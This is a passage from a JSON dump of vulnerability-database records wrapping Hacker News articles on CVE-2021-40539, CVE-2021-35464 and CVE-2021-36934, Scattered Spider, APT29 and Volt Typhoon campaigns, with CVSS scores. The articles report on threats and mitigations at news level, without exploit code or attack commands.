tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of [Emissary Panda](<https://thehackernews.com/2021/08/experts-believe-chinese-hackers-are.html>) (aka APT27, TG-3390, BRONZE UNION, Iron Tiger, or LuckyMouse).\n\nMicrosoft, which is also independently tracking the same campaign, tied it to an emerging threat cluster \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)\" that's operating out of China and has been previously detected exploiting a zero-day flaw in SolarWinds Serv-U managed file transfer service in July 2021. The Redmond-based company also pointed out the deployment of an implant called \"[Zebracon](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\" that allows the malware to connect to compromised Zimbra email servers with the goal of retrieving additional instructions.\n\n\"Organizations that identify any activity related to ManageEngine ADSelfService Plus indicators of compromise within their networks should take action immediately,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>), in addition to recommending \"domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets if any indication is found that the ['NTDS.dit](<https://attack.mitre.org/techniques/T1003/003/>)' file was compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T14:39:00", "type": "thn", "title": "Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T03:15:09", "id": "THN:D0F9B64B55AE6B07B3B0C0540189389E", "href": "https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-17T15:04:01", "description": "[![SIM Swapping Hackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhJRNzIX92Xdj41-KPPjbySdiHaYLK4b9_N3T4vdb2EeNQTa-eD4DNUEIibrs8iw7-QN68Y_7mUg-79kgaMX8jK5JDIuRVlTTjX5ok3PfSG8XsSARIvwcxICD2XAIWLU-eRoZlHFjvZ7Dlp2Z_qa9aBFMbz5M0nqm21rGXJQ5X4dDg0b19k0fOmYA2M/s728-e365/sim-hacking.png>)\n\nA persistent intrusion campaign has set its eyes on telecommunications and business process outsourcing (BPO) companies at lease since June 2022.\n\n\"The end objective of this campaign appears to be to gain access to mobile carrier networks and, as evidenced in two investigations, perform [SIM swapping](<https://en.wikipedia.org/wiki/SIM_swap_scam>) activity,\" CrowdStrike researcher Tim Parisi [said](<https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/>) in an analysis published last week.\n\nThe financially motivated attacks have been attributed by the cybersecurity company to an actor tracked as Scattered Spider.\n\nInitial access to the target environment is said to be undertaken through a variety of methods ranging from social engineering using phone calls and messages sent via Telegram to impersonate IT personnel.\n\nThis technique is leveraged to direct victims to a credential harvesting site or trick them into installing commercial remote monitoring and management (RMM) tools like Zoho Assist and Getscreen.me.\n\nShould the target accounts be secured by two-factor authentication (2FA), the threat actor either convinced the victim into sharing the one-time password or employed a technique called prompt bombing, which was put to use in the recent breaches of [Cisco](<https://thehackernews.com/2022/08/cisco-confirms-its-been-hacked-by.html>) and [Uber](<https://thehackernews.com/2022/09/uber-blames-lapsus-hacking-group-for.html>).\n\n[![SIM Swapping Hackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhR9bZqFcb5VZtSxTiYB-aeIZZ6efK-YFWhPzwRVtKXUSBLe4o3Jd2VEg7urNsTFyGlmA1b9TFhgthcWGbNykQ-KaBn2yghhar1AoneY1pl8ALxPw18IQ9G5zR6m0SCA2h2z8MT5APUXaNqadHO-cZs7lJXVIIF2yk4Snh8CLF6aoj_KvLwpqzCPjlE/s728-e365/malware-attack.png>)\n\nIn an alternative infection chain observed by CrowdStrike, a user's stolen credentials previously obtained through unknown means were used by the adversary to authenticate to the organization's Azure tenant.\n\nAnother instance involved the exploitation of a now-patched critical remote code execution bug in ForgeRock OpenAM access management solution ([CVE-2021-35464](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>)) that came under active exploitation last year.\n\nMany of the attacks further entailed gaining access to the compromised entity's multi-factor authentication (MFA) console to enroll their own devices and assigning them to the users whose credentials had been previously captured.\n\nThis technique allowed Scattered Spider to establish a deeper level of persistence through legitimate remote access tools such as AnyDesk, LogMeIn, and ConnectWise Control (formerly ScreenConnect) to avoid raising red flags.\n\nInitial access and persistence steps are followed by reconnaissance of Windows, Linux, Google Workspace, Azure Active Directory, Microsoft 365, and AWS environments as well as conducting lateral movement, while also downloading additional tools to exfiltrate VPN and MFA enrollment data in select cases.\n\n\"These campaigns are extremely persistent and brazen,\" Parisi noted. \"Once the adversary is contained or operations are disrupted, they immediately move to target other organizations within the telecom and BPO sectors.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-06T11:00:00", "type": "thn", "title": "Telecom and BPO Companies Under Attack by SIM Swapping Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2023-05-17T13:31:26", "id": "THN:8206540196B8702ACC0E342FE035E526", "href": "https://thehackernews.com/2022/12/telcom-and-bpo-companies-under-attack.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![](https://thehackernews.com/images/-zeuNR0e1nAc/YO0Yqt-mCXI/AAAAAAAADKU/ejPIO9qgMoQfOCjx-hLwFaExyDGlCuYcgCLcBGAsYHQ/s0/cyber-attack.jpg)](<https://thehackernews.com/images/-zeuNR0e1nAc/YO0Yqt-mCXI/AAAAAAAADKU/ejPIO9qgMoQfOCjx-hLwFaExyDGlCuYcgCLcBGAsYHQ/s0/cyber-attack.jpg>)\n\nCybersecurity agencies in Australia and the U.S. are [warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>) of an actively exploited vulnerability impacting ForgeRock's OpenAM access management solution that could be leveraged to execute arbitrary code on an affected system remotely.\n\n\"The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools,\" the organization [said](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>) in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them.\n\nTracked as [CVE-2021-35464](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>), the issue concerns a pre-authentication remote code execution (RCE) vulnerability in ForgeRock Access Manager identity and access management tool, and stems from an [unsafe Java deserialization](<https://owasp.org/www-project-top-ten/2017/A8_2017-Insecure_Deserialization>) in the Jato framework used by the software.\n\n[![](https://thehackernews.com/images/-jHyqkCxvcEM/YO0Zd0DMD6I/AAAAAAAADKc/qYv_O8aDk0oaueJuF_mWtS1_IM5ILQHrgCLcBGAsYHQ/s0/flaw.jpg)](<https://thehackernews.com/images/-jHyqkCxvcEM/YO0Zd0DMD6I/AAAAAAAADKc/qYv_O8aDk0oaueJuF_mWtS1_IM5ILQHrgCLcBGAsYHQ/s0/flaw.jpg>)\n\n\"An attacker exploiting the vulnerability will execute commands in the context of the current user, not as the root user (unless ForgeRock AM is running as the root user, which is not recommended),\" the San Francisco-headquartered software firm [noted](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) in an advisory.\n\n\"An attacker can use the code execution to extract credentials and certificates, or to gain a further foothold on the host by staging some kind of shell (such as the common implant Cobalt Strike),\" it added.\n\n[![](https://thehackernews.com/images/-3Yo5aIFJQoQ/YO0UmCqIAmI/AAAAAAAADKM/vFnroWDPaoka4Yfx0t-TaeE3B1H0tfEzgCLcBGAsYHQ/s0/ForgeRock-vulnerability.jpg)](<https://thehackernews.com/images/-3Yo5aIFJQoQ/YO0UmCqIAmI/AAAAAAAADKM/vFnroWDPaoka4Yfx0t-TaeE3B1H0tfEzgCLcBGAsYHQ/s0/ForgeRock-vulnerability.jpg>)\n\nThe vulnerability affects versions 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and has been addressed in version AM 7 released on June 29, 2021. ForgeRock customers are advised to move quickly to deploy the patches to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T04:48:00", "type": "thn", "title": "Critical RCE Flaw in ForgeRock Access Manager Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-13T04:52:02", "id": "THN:6510A3250EDBD304F93AA770592A8D14", "href": "https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:18", "description": "[![SeriousSAM Vulnerability](https://thehackernews.com/images/-2Vh6AhRwNKs/YP6aCnEii6I/AAAAAAAABK0/Sm1Yj72UTWQ0Kh_48L0sq_91GZSVbDq8wCLcBGAsYHQ/s728-e1000/SeriousSAM-Vulnerability.jpg)](<https://thehackernews.com/images/-2Vh6AhRwNKs/YP6aCnEii6I/AAAAAAAABK0/Sm1Yj72UTWQ0Kh_48L0sq_91GZSVbDq8wCLcBGAsYHQ/s0/SeriousSAM-Vulnerability.jpg>)\n\nMicrosoft Windows 10 and Windows 11 users are at risk of a new unpatched vulnerability that was recently disclosed publicly.\n\nAs we reported last week, the vulnerability \u2014 [SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) \u2014 allows attackers with low-level permissions to access Windows system files to perform a Pass-the-Hash (and potentially Silver Ticket) attack. \n\nAttackers can exploit this vulnerability to obtain hashed passwords stored in the Security Account Manager (SAM) and Registry, and ultimately run arbitrary code with SYSTEM privileges.\n\nSeriousSAM vulnerability, tracked as **CVE-2021-36934**, exists in the default configuration of Windows 10 and Windows 11, specifically due to a setting that allows 'read' permissions to the built-in user's group that contains all local users.\n\nAs a result, built-in local users have access to read the SAM files and the Registry, where they can also view the hashes. Once the attacker has 'User' access, they can use a tool such as Mimikatz to gain access to the Registry or SAM, steal the hashes and convert them to passwords. Invading Domain users that way will give attackers elevated privileges on the network.\n\nBecause there is no official patch available yet from Microsoft, the best way to protect your environment from SeriousSAM vulnerability is to implement hardening measures.\n\n## Mitigating SeriousSAM\n\nAccording to Dvir Goren, CTO at CalCom, there are three optional hardening measures:\n\n 1. **Delete all users from the built-in users' group** \u2014 this is a good place to start from, but won't protect you if Administrator credentials are stolen.\n 2. **Restrict SAM files and Registry permissions** \u2014 allow access only for Administrators. This will, again, only solve part of the problem, as if an attacker steals Admin credentials, you will still be vulnerable to this vulnerability.\n 3. **Don't allow the storage of passwords and credentials for network authentication **\u2014 this rule is also recommended in the [CIS benchmarks](<https://www.calcomsoftware.com/cis-hardening-and-configuration-security-guide/>). By implementing this rule, there will be no hash stored in the SAM or registry, thereby mitigating this vulnerability completely.\n\nWhen using GPOs for implementation, make sure the following UI Path is Enabled:\n\n> Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Local Policies\\Security Options\\Network access: Do not allow storage of passwords and credentials for network authentication\n\n_Despite the fact that the last recommendation offers a good solution for SeriousSAM, it may negatively impact your production if not properly tested before it is pushed. When this setting is enabled, applications that use scheduled tasks and need to store users' hashes locally will fail._\n\n## Mitigating SeriousSAM without risking causing damage to production\n\nThe following are Dvir's recommendations for mitigating without causing downtime:\n\n 1. Set up a test environment that will simulate your production environment. Simulate all possible dependencies of your network as accurately as you can.\n 2. Analyze the impact of this rule on your test environment. In this way, if you have applications that rely on hashes that are stored locally, you'll know in advance and prevent production downtime.\n 3. Push the policy where possible. Make sure new machines are also hardened and that the configuration doesn't drift over time.\n\nThese three tasks are complex and require a lot of resources and in-house expertise. Therefore, Dvir's final recommendation is to [automate the entire hardening process](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) to save the need to perform stages 1, 2 and 3. \n\nHere is what you will gain from a [Hardening Automation Tool](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>):\n\n * Automatically generate the most accurate possible impact analysis report \u2013 hardening automation tools 'learns' your production dependencies and report to you the potential impact of each policy rule. \n * Automatically enforce your policy on your entire production from a single point of control \u2013 using these tools, you won't need to do manual work, such as using GPOs. You can control and be certain all your machines are hardened.\n * Maintain your compliance posture and monitor your machines in real-time \u2013 hardening automation tools will monitor your compliance posture, alert and remediate any unauthorized changes in configurations, therefore preventing configuration drifts. \n\n[Hardening automation tools](<https://www.calcomsoftware.com?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) will learn the dependencies directly from your network and automatically generate an accurate impact analysis report. A hardening automation tool will also help you orchestrate the implementation and monitoring process.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T11:21:00", "type": "thn", "title": "How to Mitigate Microsoft Windows 10, 11 SeriousSAM Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T11:21:00", "id": "THN:777A53E3DACA2E9D76D60AB889CFD10F", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-windows-10-11.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[![Russian APT Hackers](https://thehackernews.com/new-images/img/a/AVvXsEg1htgV20xnZFGHy8xys5a3a8RDOEZB9kzl6RyaRUmt6zE03r6yB_FnqpjR1iu5tj48oBafZq6mQ2iT7IbFULnsgOYBOXm01lnZjwIF1anuI3nLsK7lL87KbyL1UWUYNDmzgkLRurzHi4oYNIEIxTxXzkVXRR89_meOuJ0FAHhdAvY6naUEmPbN4lFS=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEg1htgV20xnZFGHy8xys5a3a8RDOEZB9kzl6RyaRUmt6zE03r6yB_FnqpjR1iu5tj48oBafZq6mQ2iT7IbFULnsgOYBOXm01lnZjwIF1anuI3nLsK7lL87KbyL1UWUYNDmzgkLRurzHi4oYNIEIxTxXzkVXRR89_meOuJ0FAHhdAvY6naUEmPbN4lFS>)\n\nThe Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a series of spear-phishing campaigns mounted in October and November 2021.\n\nAccording to ESET's [T3 2021 Threat Report](<https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/>) shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the foothold to drop additional malware for gathering information about the hosts and other machines in the same network.\n\nAlso tracked under the names The Dukes, Cozy Bear, and Nobelium, the advanced persistent threat group is an infamous cyber-espionage group that has been active for more than a decade, with its attacks targeting Europe and the U.S., before it gained widespread attention for the [supply\u2010chain compromise](<https://thehackernews.com/2022/02/new-malware-used-by-solarwinds.html>) of SolarWinds, leading to further infections in several downstream entities, including U.S. government agencies in 2020.\n\nThe spear-phishing attacks commenced with a COVID-19-themed phishing email impersonating the Iranian Ministry of Foreign Affairs and containing an HTML attachment that, when opened, prompts the recipients to open or save what appears to be an ISO disk image file (\"Covid.iso\").\n\nShould the victim opt to open or download the file, \"a small piece of JavaScript decodes the ISO file, which is embedded directly in the HTML attachment.\" The disk image file, in turn, includes an HTML application that's executed using [mshta.exe](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>) to run a piece of PowerShell code that ultimately loads the Cobalt Strike Beacon onto the infected system.\n\n[![Russian APT Hackers](https://thehackernews.com/new-images/img/a/AVvXsEglwgfTakz5tfhTSwDOMYonZpvaHlCIHm8s2Siv7LsnSe0W0dFfpgbBClJWSt9tMLfPmBA10CeMIEH53LnLbqlrg4zv9mKFmIl7GHJ76TVTXmsXgB8kdL4wAXSnI_z-0ph0Mzn4DlYyAAJOJF4XIwYxPtw_NiqMAtsbd7VscqKWz0U20rPFTUjqwiDP=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEglwgfTakz5tfhTSwDOMYonZpvaHlCIHm8s2Siv7LsnSe0W0dFfpgbBClJWSt9tMLfPmBA10CeMIEH53LnLbqlrg4zv9mKFmIl7GHJ76TVTXmsXgB8kdL4wAXSnI_z-0ph0Mzn4DlYyAAJOJF4XIwYxPtw_NiqMAtsbd7VscqKWz0U20rPFTUjqwiDP>)\n\nESET also characterized APT29's reliance on HTML and ISO disk images (or VHDX files) as an evasion technique orchestrated specifically to evade Mark of the Web ([MOTW](<https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/ms537628\$v=vs.85\$>)) protections, a security feature introduced by Microsoft to determine the origin of a file.\n\n\"An ISO disk image doesn't propagate the so-called Mark of the Web to the files inside the disk image,\" the researchers said. \"As such, and even if the ISO were downloaded from the internet, no warning would be displayed to the victim when the HTA is opened.\"\n\nUpon successfully gaining initial access, the threat actor delivered a variety of off-the-shelf tools to query the target's Active Directory ([AdFind](<https://www.joeware.net/freetools/tools/adfind/>)), execute commands on a remote machine using SMB protocol ([Sharp-SMBExec](<https://github.com/checkymander/Sharp-SMBExec>)), carry out reconnaissance ([SharpView](<https://github.com/tevora-threat/SharpView>)), and even an exploit for a Windows privilege escalation flaw ([CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)) to carry out follow-on attacks.\n\n\"Recent months have shown that The Dukes are a serious threat to western organizations, especially in the diplomatic sector,\" the researchers noted. \"They are very persistent, have good operational security, and they know how to create convincing phishing messages.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T10:46:00", "type": "thn", "title": "Russian APT Hackers Used COVID-19 Lures to Target European Diplomats", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-02-10T03:04:57", "id": "THN:894809E1ADF0684644DCCDD97F76BC73", "href": "https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-27T06:23:39", "description": "[![Chinese Hackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEir9ashBlzYstB30JiY9ntCyqdFv7TBDTd3XRfvOMDk4Ka9ZdNjxIlb3oB0SGPEMienyxJnqNpL3EPyRzXieCYFB7ddRtbPPf6cJmSeMT_28A0M1BjoKpYeBtndAgeQB5vda6U3TZMGJ6d3AI2WouX5SCSc5oBPy4Djyg6XFA3d3kIm71WPd5-HpQDE8qM/s728-e365/critical.jpg>)\n\nThe newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest.\n\nThe findings come from CrowdStrike, which is tracking the adversary under the name **Vanguard Panda**.\n\n\"The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement,\" the cybersecurity company [said](<https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/>).\n\nVolt Typhoon, as known as Bronze Silhouette, is a [cyber espionage group](<https://thehackernews.com/2023/05/chinas-stealthy-hackers-infiltrate-us.html>) from China that's been linked to network intrusion operations against the U.S government, defense, and other critical infrastructure organizations.\n\n\"This adversary has been known to leverage credentials and living-off-the-land techniques to remain hidden and move quickly through targeted environments,\" Tom Etheridge, chief global professional services officer at CrowdStrike, told The Hacker News.\n\nAn analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools against a limited number of victims to carry out long-term malicious acts.\n\nIt has been further described as a threat group that \"favors web shells for persistence and relies on short bursts of activity primarily involving living-off-the-land binaries to achieve its objectives.\"\n\nIn one unsuccessful incident targeting an unspecified customer, the actor targeted the Zoho ManageEngine ADSelfService Plus service running on an Apache Tomcat server to trigger the execution of suspicious commands pertaining to process enumeration and network connectivity, among others. \n\n\"Vanguard Panda's actions indicated a familiarity with the target environment, due to the rapid succession of their commands, as well as having specific internal hostnames and IPs to ping, remote shares to mount, and plaintext credentials to use for [WMI](<https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page>),\" CrowdStrike said.\n\nA closer examination of the Tomcat access logs unearthed several HTTP POST requests to /html/promotion/selfsdp.jspx, a web shell that's camouflaged as the legitimate identity security solution to sidestep detection.\n\nThe web shell is believed to have been deployed nearly six months before the aforementioned hands-on-keyboard activity, indicative of extensive prior recon of the target network.\n\nWhile it's not immediately clear how Vanguard Panda managed to breach the ManageEngine environment, all signs point to the exploitation of [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), a critical authentication bypass flaw with resultant remote code execution.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://www.memcyco.com/home/library/the-untold-cost-of-brand-impersonation-ebook/?utm_source=thn&utm_medium=referral&utm_campaign=ebook-campaign> \"Cybersecurity\" )\n\nIt's suspected that the threat actor deleted artifacts and tampered with the access logs to [obscure the forensic trail](<https://attack.mitre.org/techniques/T1070/>). However, in a glaring misstep, the process failed to account for Java source and [compiled class files](<https://en.wikipedia.org/wiki/Java_class_file>) that were generated during the course of the attack, leading to the discovery of more web shells and backdoors.\n\nThis includes a JSP file that's likely retrieved from an external server and which is designed to backdoor \"tomcat-websocket.jar\" by making use of an ancillary JAR file called \"tomcat-ant.jar\" that's also fetched remotely by means of a web shell, after which cleanup actions are performed to cover up the tracks.\n\nThe trojanized version of tomcat-websocket.jar is fitted with three new Java classes \u2013 named A, B, and C \u2013 with A.class functioning as another web shell capable of receiving and executing Base64-encoded and AES-encrypted commands.\n\n\"The use of a backdoored Apache Tomcat library is a previously undisclosed persistence TTP in use by Vanguard Panda,\" CrowdStrike said, noting with moderated confidence that the implant is used to \"enable persistent access to high-value targets downselected after the initial access phase of operations using then zero-day vulnerabilities.\"\n\n\"In this case, [...] Vanguard Panda had an advanced understanding of the victim's environment indicating that they were persistent and went undetected prior to our technology being deployed while they carried out their reconnaissance efforts,\" Etheridge explained. \"Additionally it moved evidence, covering their tracks as they moved deeper into the victim's infrastructure.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-26T05:51:00", "type": "thn", "title": "Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks", "bulletinFamily": "info", "cvss2": 